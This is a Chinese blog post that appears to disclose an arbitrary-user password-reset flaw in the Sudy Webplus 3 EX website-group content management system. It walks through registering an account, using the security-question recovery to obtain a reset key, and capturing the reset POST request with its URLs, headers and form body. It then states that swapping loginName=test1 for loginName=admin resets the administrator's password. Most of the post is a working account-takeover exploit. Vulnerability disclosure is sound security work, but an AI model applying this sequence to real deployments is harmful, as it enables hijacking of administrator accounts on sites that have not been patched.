苏迪Webplus 3 EX网站群内容管理系统任意用户密码

时间: 2020-10-10|tag: 44次围观|0 条评论

 苏迪科技Webplus 3 EX网站群内容管理系统,用户密码找回功能存在设计缺陷,导致任意用户密码重置。

测试操作如下:

1.由于我们没有测试账号,因此需要先注册一个账号:(注册地址默认是不公开的,让人找得好辛苦啊!~~~)

http://www.ceshizhandian.edu.cn/_web/ids/userRegister.do?_p=YXM9MSZwPTEmbT1OJg__

苏迪Webplus 3 EX网站群内容管理系统任意用户密码插图

一定要填写:密保问题和密保答案哟!

2. 找回密码:

http://www.ceshizhandian.edu.cn//_web/ids/initPasswordRecoveryApply.do?_p=YXM9MSZ0PTAmcD0xJm09TiY_&t=0.3189659991047933

苏迪Webplus 3 EX网站群内容管理系统任意用户密码插图1

密码类型选择“密保问题”

3. 回答密保问题

苏迪Webplus 3 EX网站群内容管理系统任意用户密码插图2

下一步:

出现这样一个link

http://www.ceshizhandian.edu.cn/_web/ids/passwordRecoveryApplyResetPassword.do?_p=YXM9MSZ0PTAmcD0xJm09TiY_&key=27b09e73-8b7d-4575-aed5-aad9fb28478a

特别需要注意的是key 27b09e73-8b7d-4575-aed5-aad9fb28478a

当然了,你此时可以用Fiddle记录一下,重置test1用户的提交数据内容,你可以发现提交的link是这样的:

http://www.ceshizhandian.edu.cn/_web/ids/resetNewPasswordRecoveryApply.do?loginName=test1&key=27b09e73-8b7d-4575-aed5-aad9fb28478a&_p=YXM9MSZ0PTAmcD0xJm09TiY_

POST 提交: 

  Accept: text/html, application/xhtml+xml, */*
  Referer: http://www.ceshizhandian.edu.cn/_web/ids/passwordRecoveryApplyResetPassword.do?_p=YXM9MSZ0PTAmcD0xJm09TiY_&key=27b09e73-8b7d-4575-aed5-aad9fb28478a
  Accept-Language: zh-CN
  User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
  Content-Type: application/x-www-form-urlencoded
  Accept-Encoding: gzip, deflate
  Host: www.ceshizhandian.edu.cn
  Content-Length: 40
  Connection: Keep-Alive
  Pragma: no-cache
  Cookie: JSESSIONID=6A7CA28760FC74156AC23F20AE72524B; validateImageValue=4963

 

提交内容:newPassword=sexsex11&rePassword=sexsex11

如果将loginName=test1换成loginName=admin是否可以修改admin用户的密码?

答案是肯定滴!

 
    上一篇: 大朴网越权之修改任意用户订单 - 网站安全 - 自

    下一篇: 将抵抗XSS攻击进行到底 - 网站安全 - 自学php
本博客所有文章如无特别注明均为原创。
复制或转载请以超链接形式注明转自起风了,原文地址《苏迪Webplus 3 EX网站群内容管理系统任意用户密码
   

还没有人抢沙发呢~